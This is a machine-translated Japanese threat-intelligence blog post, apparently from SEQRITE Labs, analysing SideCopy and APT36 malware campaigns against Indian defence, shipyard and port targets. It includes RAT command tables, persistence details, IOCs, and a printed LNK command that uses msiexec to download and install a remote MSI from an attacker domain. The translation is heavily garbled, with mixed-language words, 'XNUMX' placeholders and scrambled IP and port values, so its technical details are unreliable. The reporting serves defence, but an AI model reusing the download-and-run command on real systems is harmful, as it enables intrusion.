An オープンディレクトリ ホスティング マルウェア リンク 透明な部族(APT36)へ によって発見されました SEQRITE Labs APTチーム. Fさらなる分析 明らかになった 隠されました URLは on 同じドメイン 含む ペイロード によって使用される そのサブ部門であるAPTグループ サイドコピー. ターゲットの インド政府機関など Air 力、 造船所と港 by Siデコピー is 観測された m経由複数のオープンディレクトリ それ hosted その NEWer ペイロードに直接影響を与えます。健全とされるのは 強い相関関係 se グループヘッド と一緒に ラスティックウェブ; 配合工業用化学製品の ドメイン/ IP, C2 名, デコイファイルs, and よ オーバーラップ されている 観測された. このブログでは、 探索します se ペイロード and オベラップ 見て 間に 最近 増加する in そのようなキャンペーン.
主な発見
APT重複
- あるドメインが、それぞれ Windows 環境と Linux 環境をターゲットとした SideCopy と APT36 の両方のペイロードを一緒にホストしていることが判明しました。
- SideCopy の RAT ペイロードによって使用される C2 サーバーは、通常 APT9 に関連付けられる同じ共通名 (WIN-P5NRMH6G8M36) を持ちます。
- 両方の脅威グループと ラスティックウェブ、感染チェーンにおいて、さまざまな形式、インフラストラクチャ、Web サービスで同じルアー ファイルを使用することで、接続を強化します。
サイドコピー感染
- SideWinderと同じ更新されたHTAを使用して検出を回避し、完全に検出不可能な状態にしています(FUD)。SideCopyのステージャーで、SideWinder APTグループのRTFファイルをホストするエンコードされたURLが検出されました。
- リバースRATは、MSIパッケージを介して「インド空軍 テーマを囮として利用したほか、メモリ内に存在するリバースRATの亜種も確認されました。さらに、造船所や港湾を標的として、BATファイル経由でリバースRATを配信するためのDOTMファイルをホストする2つのドメインで、オープンディレクトリがさらに発見されました。
- ドキュメントや画像を盗むために使用される新しいペイロード「Cheex」、接続されたドライブからファイルを盗む USB コピーソフト、FileZilla アプリケーション、および SigThief スクリプトも確認されました。
- パキスタンの拠点でアンチウイルス対策に対するステージャー回避のテストが行われていることが判明しました。同時に、通常はドイツにあるC2から観測されるインドからの被害者トラフィックが、パキスタンのIPアドレスからIPsecプロトコル経由でルーティングされていることが分かりました。 ブロフェッサー チーム・カムリより。
- HTAのメモリ内で実行されるGeta RATと呼ばれる新しい.NETベースのペイロードは、Async RATのブラウザ窃取機能を組み込んでいます。同時に、Action RATはHTAのサイドロードによって実行されます。 charap.exe その代わりに credwiz.exe/reykeywiz.exe そして、ハニートラップのテーマとして使用されます 「WhatsApp画像」 見られます。
透明な部族感染
- Linuxシステムを標的とするGo言語ベースのダウンローダーは、Googleドライブから最終ペイロードを取得するために使用されます。この最終ペイロードは最近、別のドメインから取得されたことが確認されており、 ディスゴモジ Volexity では、「SideCopy へのインフラストラクチャのリンクが弱い」と言及されています。
- このグループは、次のようなルアーテーマのデスクトップショートカットを使用して、ポセイドンでLinuxプラットフォームをターゲットにし続けています。 'Pオスティング/Ph-IIIに基づく移転 R回転 Transfer'、 'TLPと日付を含むIPアドレスのブラックリスト' また、LTCチェックリスト'。
- Crimson RATの使用は、 「ウッタラーカンド州選挙結果」 and 「源泉徴収税請求概要」 FileZilla アプリケーションの埋め込みとともに、おとりとなるものも確認されています。
図1 – 重複する感染連鎖
オーバーラッピング攻撃
オープンディレクトリで見つかったドメインは キャンパスポータル[.]in 複数のフォルダがホストされています。これらのフォルダにはAPT36に起因するGo言語ベースのLinuxペイロードが含まれていますが、同時に、SideCopy APTに属するHTAステージャーをホストする複数の隠しURLが確認されました。このドメインは元々、インドの様々な入学試験のガイドとして機能しており、Twitter/YouTubeへの最後の投稿は2016年でした。同様のオープンディレクトリが 観測された 同じソフトウェアでSideCopyステージャーを以前にホストしていた ライトスピード ウェブサーバー。この場合のドメインは、 レビュー課題[.]in 幼児教育および保育サービスに関する別の教育ポータルにも使用されました。
図2 – APT36をホスティングするOpen DirectoryとSideCopyステージャーで隠されたURL
ディレクトリの1つにZIPアーカイブがあり、パスワード保護されたPDFとUPXで圧縮されたELFバイナリが含まれています。これを解凍すると、ダウンローダーとして機能するGo言語バイナリが表示され、まずパスコード「745414'。ルアーテーマは、2023年XNUMX月以降にSideCopyが実施した複数のキャンペーンで確認されたインターネット利用状況に関する調査です。
図3 – インターネット調査のルアー
次に、Googleドライブから次のステージのペイロードをダウンロードします。 gnucoreinfo 隠しディレクトリへ .x86_32-linux-gnu実行可能ファイルを作成し、バックグラウンドで起動します。永続性は、以下の2つのAutoStartデスクトップエントリによって設定されます。 GNOME_Core.デスクトップ and GNULib_Update.desktop. bashスクリプトがドロップされ、 cron ジョブを実行してペイロードをダウンロードし、以下に示すように重複したプロセスが実行されていないことを確認します。
図4 – 永続化スクリプトにおけるGolangダウンローダーのプロセス
DISGOMOJIの亜種
最終的なペイロードは、別のUPXでパックされたGolangベースのELFバイナリで、「vmcoreinfo.txtこれはオープンソースリポジトリをベースにしたリモートアクセス型トロイの木馬です。 不和-c2、C2 として Discord サーバーを使用し、コミュニケーションには絵文字を使用します。 ヴォレクシティ DISGOMOJIのさまざまな亜種が観察されており、DiscordサーバーのサーバーIDとボットトークンは、実行時にハードコードされているか、ダウンロードされている。 BID1.txt and GID1.txt from ordai[.]questこのバージョンでは、Google ドライブを使用して次の名前でダウンロードし、2 番目のサーバーであることがわかります。
| ファイル名 | 詳細とGoogleドライブのダウンロードリンク |
| BID2.txt | MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID) |
| hxxps://drive.google.com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| GID2.txt | 1246900038160879688 (ボットトークン) |
| hxxps://drive.google.com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| GTK-テーマ-Parse.txt | 2bf596603c432fa46b494dc3edd2d30f (MD5) |
| hxxps://drive.google.com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ |
表示されるエラー処理メッセージはすべて、実際の機能から誤解を招くようにしていますが、興味深いエラー名が1つあります。「更新エラー カヴァチリポジトリ: %v「」という名前の難読化されたファイル GTK-テーマ-Parse.txt ダウンロードされると、接続されたUSBドライブからローカルディレクトリにファイルを定期的にコピーする仕組みが実行されます。同様に、永続性を確保するためのcronジョブも設定されており、これらのファイルは絵文字ベースのRATによって外部に持ち出される可能性があります。
図5 – 難読化されたUSB窃盗スクリプト
DISGOMOJIは最初に基本的なシステム詳細を収集し、その機能にはスクリーンショットの撮影、コマンドの実行、Webサービスへのファイルのアップロード(oshi[.]at and 転送[.]sh)、Discordサーバー経由でファイルをダウンロード・アップロード、Firefoxブラウザのプロファイルを取得し、拡張子に基づいてファイルを検索するといった機能があります。最後の機能には、パンジャブ語(パキスタンで最も人気のある言語)で「私はすべての知識を与えた。他に何が欲しい?」と訳される独自の文字列が含まれており、データ窃取に最適です。WindowsとLinuxの新しい亜種が登場しています。 PYSHELLFOXとGLOBESHELL ファイルの流出や Firefox プロファイルの盗難を目的とする攻撃についても BlackBerry が言及しました。
図 6 – 流出メッセージ
ポセイドンの亜種
また、Transparent TribeによるLinuxデスクトップショートカット経由でのPoseidonエージェントの継続的な展開も確認されています。餌ファイルはGoogleドライブ上に同様にホストされており、 フィクマトリーgmail.com and フィットファルコン0900 gmail.com アカウントの所有者として。 その 三 今とは異なる おとり 観測された これらはすべてインド政府のさまざまな文書に関連しています。 これらは オスティング/転送 役員の 省の管轄下 防衛 前年より, ブラックリストに登録されたIPアドレス TLP & 日付と小切手k LTC 請求のリスト。
図7 – Poseidonを使用したIPブラックリストデコイ(1)
図8 – ポセイドンを使ったチェックリストデコイ(2)
イチジク 9 – 転記/振替 ポセイドンのデコイ(3)
サイドコピー
最近のSideCopy感染で確認されたURLに基づき、同様のHTAステージャーのホスティングと、同じ餌が確認されました。感染はアーカイブされたショートカットファイルから始まり、このショートカットファイルがMSHTAプロセスを起動して、同じドメインにホストされているリモートHTAファイルを実行します。合計で6つのHTAファイルが見つかり、それぞれ以下のような名前でした。 1.hta or 2.hta. 最初のHTA亜種には、JavaScriptベースのものとActiveXオブジェクトベースのものの64つのBaseXNUMXデコード関数があります。これらの関数の機能はどちらも同じで、.NETバージョンのチェック、アンチウイルスソリューションのインストール、ペイロードとデコード文字列の連結、そして最後にメモリ内のDLL実行とデコイファイルの受け渡しが含まれます。
図10 – HTAステージャー2nd 異形
2 番目の HTA 亜種は高度に難読化されており、複数の手法を使用しているのが昨年から時々確認されています。
- カスタムアルファベットを使用して、base64のようなエンコードされた文字列をデコードします。
- XORベースの復号化(キー:f551e832およびbWqQ)
- 1/2/5文字ごとに文字列を反転
- 複数の鍵を使ったシーザー暗号シフト
図11 – HTAにおける難読化解除
全体的な機能は同じですが、これらの難読化パターンは昨年からSideWinder APTのHTAで確認されています。スクリプト内で使用されていない文字列にはURL(キャビネット-gov-pk[.]ministry-pk[.]net) は数年前に SideWinder の RTF ファイルをホストしていました。
図12 – SideWinder URLを使用したSideCopyステージャー(分析からのコメント)
インメモリ プレボッタ DLLは、デコイを開いてアンチウイルスソリューションをインストールするという通常のシーケンスを実行します。アンチウイルスソリューションに基づいて、スケジュールされたタスク(VBScript)、レジストリキーの実行、またはスタートアップショートカットの組み合わせとして永続性を設定します。最終的には、2つの追加のHTAファイルをドロップするか、または「hxxps://campusportals.in//files//documents//backup//ap.txt' 側面にロードされる charap.exe これはC64.188.27のポート144で5863[.]2に接続します。
図13 – RTFファイルをホスティングするSideWinderドメイン
ドロップされたHTAファイルはuseH、useT、alphaTという名前で、前述のHTA機能と同じ機能を持ち、最後にメモリ内でDLLを実行します。19つの異なるDLLが見つかりました。2つはReverse RATで、C30用の2個のコマンドとUSBファイルグラバーを備えており、新しいドライブが接続されるたびにファイルとフォルダを保存します。もうXNUMXつは、CXNUMX用のXNUMX個のコマンドを備えた新しい.NETベースのGeta RATで、FirefoxとChromiumベースのブラウザのすべてのアカウント、プロファイル、Cookieデータを窃取することもできます。このブラウザプラグインは、以下に示すようにAsync RATから借用されています。
図14 – Geta RATとAsync RATの比較
| いいえ | Command | Functionality |
| 1 | 切断された | 接続を閉じる |
| 2 | システム情報 | システムデータ(コンピューター名、ユーザー名、画面サイズ、使用可能メモリと合計メモリ(物理メモリと仮想メモリ)、OS の詳細、バッテリー電源の状態、システム稼働時間、ドライバー、ネットワークの詳細)を取得します。 |
| 3 | pkill | 特定のプロセスを終了し、プロセスリストを取得します |
| 4 | プロセスマネージャー | プロセスリストを取得する |
| 5 | ソフトウェア | インストールされたソフトウェアを入手する |
| 6 | パスワード | すべてのアカウント/プロファイル/CookieからFirefoxとChromiumベースのブラウザの資格情報を取得します |
| 7 | RD | リモートデスクトップのスクリーンショットを取得する |
| 8 | 取得PC境界 | 画面サイズを取得する |
| 9 | 現在位置の設定 | カーソル位置を設定する |
| 10 | ホストファイルを取得 | \etc\hostsファイルを取得する |
| 11 | ホストファイルを保存する | \etc\hostsファイルを指定した場所に保存します。 |
| 12 | GetCPText | クリップボードの内容を取得する |
| 13 | CPテキストを保存 | クリップボードの内容を指定した場所に保存する |
| 14 | シェル(Shell) | 「cmd /C」でコマンドを実行する |
| 15 | 録音開始 | 機能は定義されていないが、おそらくスクリーンキャプチャに使用される |
| 16 | 録音停止 | 機能は定義されていないが、おそらくスクリーンキャプチャに使用される |
| 17 | 録音ダウンロード | 機能は定義されていないが、おそらくスクリーンキャプチャに使用される |
| 18 | リストドライブ | ドライブリストを取得する |
| 19 | リストファイル | 指定されたパスのファイルとディレクトリを取得する |
| 20 | mkdir | Create a new directory |
| 21 | rmdir | ディレクトリを削除する |
| 22 | rnフォルダ | ディレクトリの名前を変更する |
| 23 | mvdir | ディレクトリを移動する |
| 24 | rmファイル | ファイルを削除する |
| 25 | rnファイル | ファイルの名前を変更する |
| 26 | シェアファイル | ファイルをダウンロードする |
| 27 | ラン | ファイルを実行する |
| 28 | 実行する | 1. ファイルをアップロードし、DLLサイドローディングで実行する 2. 「cmd /C netstat -ano」を実行し、サーバIPの接続ステータスを取得します。 3. AVをインストールする |
| 29 | アドシステム | レジストリまたはスタートアップ経由で永続性を設定する |
| 30 | ファイルアップロード | Upload a file |
CACTUS TORCHとSILENT TRINITYに類似したHTAの類似バージョンが2つ確認されましたが、検出を完全に回避しています。これらのバージョンはショートカットファイルを介して実行され、ハニートラップや米中対立といったテーマを利用して最終的なペイロードをドロップします。
図15 – 新しいHTAステージャー
この新しい HTA には機能は同じですが、次のような違いがあります。
- base64デコードに加え、データ長を指定してデコードする別の関数も使用されます。基本的に、埋め込まれたDLLはこれらの関数を使用してXNUMX回エンコードされます。
- デコイとサイドロードされた DLL は、HTA に個別に埋め込まれるのではなく、.NET DLL 自体に埋め込まれます。
- AV をインストールするために WMI クエリを使用しません。また、.NET バージョンを取得するために VBScript も使用しません。
- 重要なのは、インスタンスを作成して動的に呼び出すためのターゲットが指定されていないことです。
図16 – 簡略化されたHTAバージョン
ロードする代わりに プレボッタ or サミットオブビオン メモリ内、 BroaderAspect.dll デコイファイルをドロップして開くところが見られます。アンチウイルスソフトのチェックは行われませんが、レジストリの実行キーが永続化のために設定され、DLL(DUser.dll)がサイドロードとしてドロップされます。 再入力ターゲット ディレクトリは 'C:\Users\Public\BroadCastUSB\crezly.exe' で、2 つのファイルに関連付けられている PDB パスは 'E:\TestAssembly\obj\Debug\BroaderAspect.pdb' です。
図17 – MSHTAのメモリ内で実行されるDLL
リバースRATキャンペーン
リバースRATにつながる複数の感染が確認されており、これらの感染は、造船所、港湾、さらには空軍に関連するルアーや偽ドメインを利用しています。これらの組織はすべて、インド政府の国防省(MoD)および港湾・海運・水路省(MOPSW)の管轄下にあります。
図18 – 逆RAT感染と標的
同じタイムラインで、Reverse RATのスタンドアロンの亜種がMSIパッケージ経由でドロップされました。ZIPファイルの名前は「2024年度の給与増額' には、MSI パッケージをダウンロードして実行するための LNK ショートカットが含まれています:
- C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
このパッケージは、以下の画像に示すように、カスタムアクションとインストールシーケンス中に実行される.NET Confuser PEファイルで構成されています。リバースRATは「C:\\ProgramData\\VSUpdates\\svirbre.exe最後に「」と入力し、C19用の同じ2個のコマンドを実行し、別のHTAスクリプトでCXNUMXの永続性を設定する。 ファイルロス.hta 実行レジストリ キーを使用します。
| いいえ | Command | Functionality |
| 1 | ラン | ファイルを実行する |
| 2 | リスト | パスのファイルまたはディレクトリを一覧表示する |
| 3 | pkill | 実行中のプロセスを強制終了 |
| 4 | 閉じる | C2との接続を閉じる |
| 5 | リネーム | ファイルの名前を変更する |
| 6 | screen | スクリーンショットを撮る |
| 7 | upload | C2にファイルをアップロードする |
| 8 | 削除 | ファイルを削除する |
| 9 | 登録リスト | すべてのレジストリキーとその値を一覧表示する |
| 10 | プロセス | 実行中のすべてのプロセスを一覧表示する |
| 11 | プログラム | インストールされているすべてのプログラムを一覧表示する |
| 12 | ダウンロード | C2からファイルをダウンロードする |
| 13 | 作成ディレクトリ | Create a new directory |
| 14 | シェルエグゼック | cmd.exe を使用してコマンドを実行するか、ファイルを開きます |
| 15 | regnewkey | 新しいレジストリキーを作成する |
| 16 | クリップボード | クリップボードの内容を取得する |
| 17 | regdelkey | レジストリキーを削除する |
| 18 | ダウンロードexe | ファイルをダウンロードして実行する |
| 19 | クリップボードセット | クリップボードの内容を設定する |
図19 – リバースRATをドロップするMSIパッケージ
ペイロードを含む感染チェーンは次のとおりです。
| ファイル名 | Details |
| 給与増額_2024年度.zip | 更新日: 2024-06-03 |
| 給与増額_FY_2024.pdf.lnk | マシンID: cop125n、変更日: 2023-12-04 |
| newpictures.png (MSI) | 更新日: 2020-09-18、作成者: MSTech Soft |
| フィルムエオス.exe | .NET コンフューザー 1.x |
| svirbre.exe (リバースRAT) | キー: winupdates@7 C2: defender.windowupdatecache[.]in/officalupdates |
投下されたおとり文書には、インド空軍の職員に支給される給与の増額に関する詳細が記載されています。これは最近の文書であり、支給開始日が2024年XNUMX月と記載されています。
図20 – インド空軍の給与デコイ
オープンディレクトリの増加
7月には、タイムスタンプから確認できるように、新旧両方のSideCopyペイロードをホストするオープンディレクトリを持つドメインがさらに2つ確認されました。これらには、リバースRATキャンペーンで使用される複数のEXE、PNG、PDF、BATなどのドキュメントが含まれています。 スライドファインダー[.]com 別のドメインからペイロードを取得する7月のサンプルをホスト mazagondoc[.]com2023 年 XNUMX 月には、テンプレート インジェクション攻撃用のファイルをホストしていました。
図21 – SideCopyペイロードをホストするオープンディレクトリ
マクロが有効になっている2つのテンプレート文書 航空宇宙.dotm and tmps.dotm 感染チェーンの始まりとなる、難読化されたサブルーチンが文書を開くと実行され、ホストされているPNGファイルをバッチスクリプトとしてダウンロードします。08973422348.batHTTP 応答が 200 の場合、バッチ ファイル "." を TEMP ディレクトリにコピーします。ファイルが存在する場合は、Shell 関数を使用してバッチ ファイルを実行します。
図22 – テンプレート文書内のVBAマクロ
テンプレートの1つでは、その後、アクティブドキュメントの添付テンプレートを次のものに変更するUNLKサブルーチンを呼び出します。 Normal.dotm ユーザーのディレクトリにあるテンプレートを開き、変更を保存せずにドキュメントを閉じます。エラーが発生した場合は、DVBPサブルーチンを呼び出してドキュメントからすべてのVBAコンポーネントを削除し、すべてのVBAコードを削除します。以下に示すバッチスクリプトは、基本的にリバースRATペイロードをPNG形式でダウンロードします。 PowerShellのそれを隠しディレクトリにコピーし、5 分ごとに実行されるスケジュールされたタスクを作成します。
図23 – リバースRATをダウンロードするためのバッチスクリプト
デコイファイル 手紙002.pdf 同時にダウンロードされ、開かれます。これは、港湾・海運・水路省管轄下のコーチン造船所の2024年XNUMX月契約の詳細です。これらの月次契約の詳細はすべて入手可能です。 公然と リバースRATは、19個のコマンドをリッスンするだけでなく、別のファイルをダウンロードします。 mazagondoc[.]com 国防省の公式マザゴンドック造船会社を模倣したドメイン – mazagondock[.]in ウェブサイト。このドメインは、2023年2月に同様の標的を狙ったRevere RATを配信したキャンペーンでもペイロードをホストしていたことが確認されています。Reverse RATで確認されたCXNUMXは vocport[.]com/Contactus、 これは、港湾・海運・水路省管轄のVOチダンバラナール港湾局の領域を模倣したものです。
図24 – コーチン造船所の契約詳細が記載されたデコイ
.NETがますます増える
特定の拡張子を持つファイルを検索・保存する機能を持つ、新しい.NETベースのペイロードがダウンロード・実行されます。これらのペイロードは、2つのサンプルで確認されているように、以下のサーバーに流出します。
- hxxp://149.28.95.195/dakshf_upload.php
- hxxps://googleservices[.]live/dakshf_upload.php
これらのサンプルには、ユーザー名「「デッド・スネーク」 cheexという名前(この名前の無関係なオンラインプラットフォームが存在します)。このマルウェアは、デスクトップ、個人、共通ドキュメント、ダウンロード、最近使用したファイルの12つのフォルダで、DOCX、DOC、XLSX、XLS、PPTX、PPT、PDF、BAK、JPEG、JPG、PNG、TXTのXNUMX種類の拡張子を持つファイルを検索します。
| C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb |
| C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb |
図25 – ファイル流出のための新しいペイロード
前述のMSI経由で配信されたリバースRATでは、接続されたUSBデバイスからファイルを抽出するための機能が含まれていましたが、現在ではこの機能は完全に独立したモジュールとして提供されています。すべてのドライブレターが列挙され、ファイルはバックグラウンドワーカーを使用してTEMPディレクトリにコピーされた後、同じIPアドレスにアップロードされます。2つのサンプルで確認されたPDBパスは次のとおりです。
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb |
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb |
他に観察されたファイルは、マクロが有効になっている文書、おとりファイル、FileZillaアプリケーション(ファイル転送に使用)、オープンソースのPythonスクリプトです。 シグシーフ 署名を盗んで追加するために使用されるこれらのマルウェアは、以前のキャンペーンに関連してホストされていました。
- 海軍プロジェクト支払いセクションレポート29092023.docx
- 海軍プロジェクト支払いセクションレポート131023.docx
- プロジェクトおよびサービスセクションレポート_10102023.docx
- 手紙002.pdf
- 海軍プロジェクト.pdf
2023年のキャンペーンで使用された他のおとり文書も同じドメインで発見されました。これらは、政府のVOチダンバラナール港湾局の入港許可証と、海軍プロジェクトに関連するベンダーの請求書のステータスに関するものでした。これらのおとり文書は、 公然と 利用可能なドキュメント。
図26 – 2023年XNUMX月のキャンペーンの軍港をテーマにしたデコイ
図27 – 2023年XNUMX月のキャンペーンからの海軍プロジェクト請求書をテーマにしたおとり
インフラストラクチャとアトリビューション
これまでの分析から、パキスタンに関連する3つのAPTグループに共通点が見られます。Transparent TribeはGolang、Pythonなどの言語を用いて多様な手法を駆使することで知られており、Operation RusticWebはRustベースのペイロードを使用しています。どちらもRustを使用しています。 oshi[.]at Web サービスでは、2 つの同じ PDF のおとり文書とそれらの偽のドメインが、BlackBerry と Volexity によって観測されたものと同じ IP アドレスに解決されました。
図28 – パキスタンのAPT重複
同様に、SideCopyとAPT36の間にも、ルアーなどの重複が観察されている。 Linuxステージングツール それぞれAres RATとPoseidonをドロップするペイロードは アラコレRAT C2の共通名です。RusticWebは、SideCopyがAPT36のサブチームとして活動しているのと同様に、中程度から高い確度でAPT36と直接関連していると考えられます。
ペイロードをホストするために使用される偽の/侵害されたドメインは、次の IP アドレスに解決されます。そのうちの 0 つは、共通名が WIN-BEJO5EMFOXNUMXK であることが確認されています。
| ドメイン | IP | ASN |
| キャンパスポータル[.]in | 192.64.117[。]203 | AS22612 – ネームチープ |
| mazagondoc[.]com | 172.67.217[。]17 CN=WIN-BEJO0EMFO5K |
AS13335 – クラウドフレア |
| スライドファインダー[.]com | 103.133.215[。]65 CN=WIN-BEJO0EMFO5K |
AS133643 – Ewebguru、インド |
| ディプル[.]サイト | 151.106.117[。]91 | AS47583 – ホスティング |
| ウトカルセヴァサミティカンジュルマルグ[.]in | 162.0.209[。]114 | AS22612 – ネームチープ |
C2サーバーを見ると、IP 64.188.27[。]144 同じポートでAction RATとGeta RATが使用されましたが、Reverse RAT C2でも使用されました。 checkdailytips.servehttp[.]com そのIPに解決されます。それに関連付けられた共通名は WIN-P9NRMH5G6M8 APT2 のほとんどの C36 サーバーで見つかります。
図29 – APT36の共通名を持つIP
ドメイン vocport[.]com 2023年2月からの過去のキャンペーンと同様に現在も使用されています。ペイロードが観測されたすべてのCXNUMXサーバーのWhois詳細は次のとおりです。
| IP | ASN | ペイロード |
| vocport[.]com 104.21.40[。]190 172.67.156[。]79 |
AS13335 – クラウドフレア | リバースRAT |
| defender.windowupdatecache[.]in 172.67.128[。]127 |
AS13335 – クラウドフレア | リバースRAT |
| checkdailytips.servehttp[.]com dns1.indianblog[.]xyz 64.188.27[。]144 |
AS8100 – クアドラネット
CN=WIN-P9NRMH5G6M8 |
リバースRAT、アクションRAT、下駄RAT |
| googleservices[.]ライブ 149.28.95[。]195 |
AS13335 – クラウドフレア AS20473 – チューパ |
Cheex、USBコピー機 |
| 84.247.170[。]237 | AS51167 – コンタボ | 新しいRAT |
| 165.22.221[。]71 178.128.166[。]148 152.42.162[。]105 161.35.207[。]209 159.65.146[。]80 157.245.100[。]177 |
AS 14061 – デジタルオーシャン | ポセイドン |
この相関関係と以前の攻撃チェーンに基づくと、これらのキャンペーンは高い確度で APT36 グループと SideCopy グループの両方に起因しており、両者の間にさらに強力なつながりが確立されます。
結論
パキスタンのAPTグループに関連するステージャー/ペイロードをホストする複数のオープンディレクトリが発見され、インド空軍、政府機関傘下の港湾・造船所が標的とされていました。Transparent Tribe、SideCopy、RusticWebの間で重複が見られる様々なサイバー攻撃活動が確認されています。
APT36は主にLinuxシステムを標的としていますが、SideCopyはWindowsシステムを標的とし、新たなペイロードを武器に加えています。2024年第XNUMX四半期には、インドを標的とするパキスタン系脅威グループが複数報告されており、Androidベースのマルウェアを使用しています。これには、Operation Celestial Force(オペレーション・セレスティアル・フォース)が含まれます。 宇宙ヒョウ そしてもう一つの新しい グループヘッド WhatsAppを活用して配信 スパイノート RAT。インドではサイバー攻撃が絶えず発生しているため、必要な予防措置を講じ、保護された状態を維持することをお勧めします。
SEQRITE 保護性能
- リンク.サイドコピー.48846.Gen_GC
- MSI.Sidecopy.48847.GC
- JS.サイドコピー.48848.Gen_GC
- Docx.APT36.48849.GC
- ELF.エージェント.48863.GC
- ELF.エージェント.48860.GC
- O97M.ドロッパー.DZ
- BAT.ダウンローダー.48924
- XML.サイドコピー.48922
- XML.サイドコピー.48923
- TrojanAPT.ReverseRAT.S33893087
IOC
サイドコピー
| HTA | |
| ced11422832a7380381323ae78a7a9bc f270105309e6574cab7a6acb1efb3c20 c574b2ebcc0aff84a23f1215f8a803be |
1.hta |
| 4938f42a3d691ef78f1ee8edc3b38f87 817532c454637a302238a4751694c336 e2f8fbc105a84283e191362f4ca07ae4 |
2.hta |
| 7c3b49f642f19116878b2c190f344f63 | alphaT.hta |
| f6a58b0d267c7c53ccbcc6dafafd499b f55afc8192f30ff7a584dbda700383d1 |
useH.hta |
| d6ae362b4b3f7a67949d177fdfc6bdec | 使用T.hta |
| 907ba4486c589f2cb4a45b92f2a5350e | 画像12542.hta |
| 336316c1b5ed77d31b4adc06e06a2f84 | ugt254d.hta |
| LNK | |
| f60c1a04161f354f0c6ac4678b3062d0 | 給与増額_FY_2024.pdf.lnk |
| 4dfdacf33db6ae0341b4d0e65aa3d755 | WhatsApp_Image_2024-05-06.lnk |
| 2041d2347f78ce03c1f9e990724adf3c | 米中対立-インドにとっての機会-チャドハ-21月23日-XNUMX.lnk |
| ZIP | |
| fe8bf0bf2697d5e43e38d4b0364485a6 | 給与増額_2024年度.zip |
| b99717d81e142e58af91efb4d5288bda | WhatsApp_Image_2024-05-06.zip |
| 109897ba1f92339f9dc9a74dc38dfc88 | US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip |
| マルドック | |
| 807e6c1094b760e748a84ef9e05bc1f8 | 航空宇宙.dotm |
| abb863131bbffad1dd8ee72d0758f34b | tmps.dotm |
| eebb4913b54af93bcfc7d56e081502af | プロジェクトおよびサービスセクションレポート_10102023.docx |
| e73b0354790273b0fcaa8c2deab3ad87 | 海軍プロジェクト支払いセクションレポート131023.docx |
| 44b23edd6c9a63a2a38f1bf3d4ff5bb9 | 海軍プロジェクト支払いセクションレポート29092023.docx |
| 354716db015373c089744e7319cd93d3 | 海軍プロジェクト支払いセクションレポート29092023.docx |
| その他 | |
| 6b45d5f194e2799e5178c8d858673900 | 08978.png (バット) |
| 56fd3a2f701d30fe3e5ebdd0d471f1ed | newpictures.png (MSI) |
| エグゼ | |
| 2478a5f6b82461eb06f3099478c4e2f6 | DUser.dll |
| 97113b266fbff61d8d2f92793672688d | フィルムエオス.exe |
| 96764912417d260653b6949afb0ad25c | Chromes.exe |
| 6a0adcf34a2f0ac21089b994dff02b85 | ファイルジラ.exe |
| リバースRAT | |
| a7a71259bdf700807a763119fd652e73 | svirbre.exe / Fantos.exe |
| c006701ec5025222a74a419f8c238689 | Postgrex.exe / rtloki.png |
| d5719a9ef7a6f012e26d0c86b4a676d9 | igfxm.exe / rt12.png |
| e6404136626a446b46bf4ecaa885560e | igfxtk.exe |
| チークス | |
| 825c7a1603f800ff247c8f3e9a1420af | AdobeArm.exe / dlhost.exe |
| 253957d7df5c7e70ec9001766e8f087b | cheex.exe |
| USBコピー機 | |
| 3d2001c112290c019afcd51fede564d3 | AdobeReaders.exe / msedg.exe |
| 7ca8532b081f8612d1c0b6ea01d40299 | AdobeReaders.exe / msedgprefix.exe |
| おとり | |
| 5e88b5122ae380c4b4741dcf0bdca198 | 給与増額_2024年度.pdf |
| e415374f1f9533f10f706f0a9124b0d4 | WhatsApp 画像 2024 年 05 月 06 日午前 12.23.08 時 XNUMX 分 XNUMX 秒.jpeg |
| e79ca3852ae5e14766544ec1d5d4d268 | 米中対立:インドにとっての好機 チャダ 21年23月XNUMX日.pdf |
| cc0b292144ccdf4a95014809258982c4 | 手紙002.pdf |
| 584ce9670a6f6a16eaaa615d64788f68 | 海軍プロジェクト.pdf |
| b2e007c6bde2d2ce03a5257732df95b2 | 001doc.pdf |
| d254f6d56ad874c5095b92d620cb5b80 | ITトレンド.docx |
| 5fc559e4b663c20c9d5ea46fd164f4c7 | アンケート.docx |
| f997a21e9f7ad5eb9242b4decb7fdeb9 | インドの新興世界経済.docx |
| ドメイン(偽造/侵害) | |
| ウトカルセヴァサミティカンジュルマルグ[.]in | 162.0.209[。]114 |
| ディプル[.]サイト | 151.106.117[。]91 |
| キャンパスポータル[.]in | 192.64.117[。]203 |
| mazagondoc[.]com | |
| スライドファインダー[.]com | |
| C2とポート | |
| checkdailytips.servehttp[.]com/dailyworkout | |
| defender[.]windowupdatecache[.]in/ 172.67.128 [。] 127:80 |
|
| 84.247.170 [。] 237:4858 | |
| 64.188.27 [。] 144:5863 | |
| hxxp://vocport[.]com/お問い合わせ | |
| hxxp://vocport[.]com/khalistanLeaderprotest | |
| hxxp://149.28.95[.]195/dakshf_upload.php | |
| hxxps://googleservices[.]live/dakshf_upload.php | |
| URLは | |
| hxxps://campusportals[.]in/files/documents/bs/economy/ | |
| hxxps://campusportals[.]in/files/documents/bs/economy/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/economy/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/ | |
| hxxps://campusportals[.]in/files/documents/bs/it/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/ | |
| hxxps://campusportals[.]in/files/documents/bs/survey/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/2.hta | |
| hxxps://campusportals[.]in/files/2.hta | |
